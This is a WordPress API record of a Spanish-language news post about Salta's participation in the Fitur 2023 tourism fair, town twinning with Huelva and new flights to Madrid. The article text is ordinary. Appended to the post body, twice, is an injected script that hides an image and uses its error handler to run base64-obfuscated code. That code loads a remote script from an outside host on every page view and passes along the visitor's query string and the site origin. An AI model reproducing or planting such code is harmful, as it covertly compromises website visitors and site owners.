{"id":2115,"date":"2023-01-23T17:33:38","date_gmt":"2023-01-23T20:33:38","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2115"},"modified":"2025-08-14T00:24:59","modified_gmt":"2025-08-14T03:24:59","slug":"fitur-2023-salta-reforzo-su-presencia-en-mercados-turisticos-internacionales","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2115","title":{"rendered":"Fitur 2023: Salta reforz\u00f3 su presencia en mercados tur\u00edsticos internacionales"},"content":{"rendered":"\n<h4 class=\"has-white-color has-vivid-cyan-blue-background-color has-text-color has-background wp-block-heading\"><em>Salta inicia el 2023 con una destacada participaci\u00f3n en lo que fue una nueva edici\u00f3n de la Feria Internacional de Turismo, una de las m\u00e1s importantes del circuito internacional, ya que este espacio fue el marco ideal para avanzar en acciones estrat\u00e9gicas de promoci\u00f3n y posicionamiento del destino a nivel global.<\/em><\/h4>\n\n\n\n<p>La presencia de la Provincia en Fitur forma parte del Plan Liderar y se basa en la decisi\u00f3n pol\u00edtica del gobernador Gustavo S\u00e1enz de seguir trabajando por el crecimiento estrat\u00e9gico de la actividad tur\u00edstica en todo el territorio y la consecuente generaci\u00f3n de oportunidades y puestos de trabajo.<\/p>\n\n\n\n<p>El equipo del destino Salta, que integr\u00f3 la delegaci\u00f3n Argentina encabezada por el ministro Mat\u00edas Lammens, estuvo integrado por el ministro de Turismo y Deportes Mario Pe\u00f1a y el presidente de la C\u00e1mara de Turismo provincial Gustavo Di Mecola.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5528-fitur-2023-salta-reforzo-su-presencia-en-mercados-turisticos-internacionales.jpeg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5528-fitur-2023-salta-reforzo-su-presencia-en-mercados-turisticos-internacionales.jpeg\" alt=\"Fitur 2023: Salta reforz\u00f3 su presencia en mercados tur\u00edsticos internacionales\"\/><\/a><\/figure>\n\n\n\n<p>El documento establece las herramientas necesarias para que operadores tur\u00edsticos que comercializan experiencias tur\u00edsticas argentinas en todo el mundo contin\u00faen posicionando la experiencia \u201cNorte\u201d en los centros emisivos del mundo.<\/p>\n\n\n\n<p>Cabe destacar que, en el 2020 eran apenas 2 agencias las que comercializaban la regi\u00f3n en el \u00e1mbito internacional, y como resultado de la visi\u00f3n integral que comparten el Ente Norte y la CAT, se logr\u00f3 que actualmente sean m\u00e1s de 25 las firmas que incluyan dentro de sus carpetas de ventas a Salta, Jujuy, Tucum\u00e1n, Santiago del Estero, Catamarca y La Rioja.<\/p>\n\n\n\n<p>Con esta decisi\u00f3n estrat\u00e9gica, Salta contin\u00faa fortaleciendo su posicionamiento ya que a la presencia en los mercados internacionales se suma el reconocimiento como el destino m\u00e1s competitivo del mundo&nbsp; de acuerdo al informe realizado por el estudio Singerman &amp; Mak\u00f3n.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5530-fitur-2023-salta-reforzo-su-presencia-en-mercados-turisticos-internacionales.jpeg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5530-fitur-2023-salta-reforzo-su-presencia-en-mercados-turisticos-internacionales.jpeg\" alt=\"Fitur 2023: Salta reforz\u00f3 su presencia en mercados tur\u00edsticos internacionales\"\/><\/a><\/figure>\n\n\n\n<p>\u201cSin lugar a dudas la construcci\u00f3n de estas alianzas resultan centrales para los destinos, pero debemos seguir trabajando junto al Gobierno Nacional para lograr una conectividad a\u00e9rea directa con nuestras regiones. Lograr este punto resulta fundamental al momento de proyectar el crecimiento del turismo receptivo en nuestro pa\u00eds\u201d, manifest\u00f3 el ministro de turismo y deportes Mario Pe\u00f1a.<\/p>\n\n\n\n<p>Por su parte, el presidente de la C\u00e1mara de Turismo, valor\u00f3 positivamente el trabajo de promoci\u00f3n que Salta viene realizando en los centros tur\u00edsticos emisivos m\u00e1s importantes del mundo, y agreg\u00f3, \u201cesta decisi\u00f3n se complementa y fortalece con acciones concretas como la inversi\u00f3n en obras y el consecuente desarrollo en t\u00e9rminos de infraestructura, como lo es el caso del nuevo Centro de Convenciones de Cafayate\u201d.<\/p>\n\n\n\n<p>Por \u00faltimo, el referente del sector privado destac\u00f3 la firma del convenio entre la C\u00e1mara Argentina de Turismo y el Ente Norte. \u201cGarantizarle un lugar a la regi\u00f3n y puntualmente a Salta en la g\u00f3ndola tur\u00edstica del mundo es central y no ser\u00eda posible si no se trabajara de manera conjunta entre el sector privado y el p\u00fablico\u201d, concluy\u00f3 Di Mecola.<\/p>\n\n\n\n<p><strong>Cooperaci\u00f3n<\/strong>&nbsp;<strong>internacional<\/strong><\/p>\n\n\n\n<p>El fortalecimient&nbsp;de las relaciones internacionales fue otro de los puntos destacados de esta edici\u00f3n de Fitur. Como resultado de un trabajo conjunto entre el Gobierno provincial a trav\u00e9s del Ministerio de Turismo y Deportes, la Embajada Argentina en Espa\u00f1a y los municipios de Cerrillos y Huelva (Espa\u00f1a), se firm\u00f3 un convenio de hermanamiento entre los \u00faltimos dos.<\/p>\n\n\n\n<p>La importancia de esta acci\u00f3n radica en el reconocimiento internacional de Cerrillos como destino productor de algo \u00fanico como lo es el jam\u00f3n de cerdo alimentado a bellota, originario de Espa\u00f1a, y la consecuente vinculaci\u00f3n con Huelva que permitir\u00e1 incrementar el nivel de posicionamiento de estas experiencias \u00fanicas en el mundo.<\/p>\n\n\n\n<p>De la firma de este convenio participaron el embajador Ricardo Alfons\u00edn, el alcalde de Huelva Gabriel Cruz Santana, la intendente Yolanda Vega, el ministro representante de relaciones internacionales Julio San Mill\u00e1n y el productor salte\u00f1o Kiko Fern\u00e1ndez.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5531-fitur-2023-salta-reforzo-su-presencia-en-mercados-turisticos-internacionales.jpeg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5531-fitur-2023-salta-reforzo-su-presencia-en-mercados-turisticos-internacionales.jpeg\" alt=\"Fitur 2023: Salta reforz\u00f3 su presencia en mercados tur\u00edsticos internacionales\"\/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5532-fitur-2023-salta-reforzo-su-presencia-en-mercados-turisticos-internacionales-20230122222209.jpeg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5532-fitur-2023-salta-reforzo-su-presencia-en-mercados-turisticos-internacionales-20230122222209.jpeg\" alt=\"Fitur 2023: Salta reforz\u00f3 su presencia en mercados tur\u00edsticos internacionales\"\/><\/a><\/figure>\n\n\n\n<p>Asimismo, los ministros del Ente Norte mantuvieron una reuni\u00f3n con el embajador Alfons\u00edn a fin de plantear una agenda de acciones com\u00fan enfocada en potenciar el arribo de turistas ib\u00e9ricos a las 6 provincias.<\/p>\n\n\n\n<p>El ministro Pe\u00f1a destac\u00f3 y agradeci\u00f3 la decisi\u00f3n pol\u00edtica tomada por el diplom\u00e1tico de acompa\u00f1ar a la regi\u00f3n indicando, \u201cDesde los destinos vamos a seguir apuntalando aspectos como la formaci\u00f3n, capacitaci\u00f3n y la inversi\u00f3n que demandan mercados como el espa\u00f1ol\u201d.<\/p>\n\n\n\n<p><strong>Argentina<\/strong>&nbsp;<strong>m\u00e1s<\/strong>&nbsp;<strong>conectada<\/strong>&nbsp;<strong>con<\/strong>&nbsp;<strong>el<\/strong>&nbsp;<strong>mercado<\/strong>&nbsp;<strong>europeo<\/strong><\/p>\n\n\n\n<p>Carlos Figueroa, director de Comunicaciones de Aerol\u00edneas Argentinas, anunci\u00f3 el incremento de frecuencias a Madrid y Roma a partir de abril 2023. Ser\u00e1n 9&nbsp; las frecuencias operativas, lo que resultar\u00e1 en la disponibilidad de vuelos durante 5 d\u00edas de la semana.<\/p>\n\n\n\n<p>En lo que respecta a los arribos a Madrid, el incremento ser\u00e1 de 9 vuelos semanales a partir de abril para luego sumar 3 m\u00e1s en junio lo que totalizar\u00e1 12 vuelos semanales a la capital espa\u00f1ola.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/fitur-2023-salta-reforzo-su-presencia-en-mercados-turisticos-internacionales-87426\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Salta inicia el 2023 con una destacada participaci\u00f3n en lo que fue una nueva edici\u00f3n de la Feria Internacional de Turismo, una de las m\u00e1s importantes del circuito internacional, ya que este espacio fue el marco ideal para avanzar en acciones estrat\u00e9gicas de promoci\u00f3n y posicionamiento del destino a nivel global. La presencia de la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2116,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[22],"tags":[],"class_list":{"0":"post-2115","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-internacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2115"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2115"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2115\/revisions"}],"predecessor-version":[{"id":7200,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2115\/revisions\/7200"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2116"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2115"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2115"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2115"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}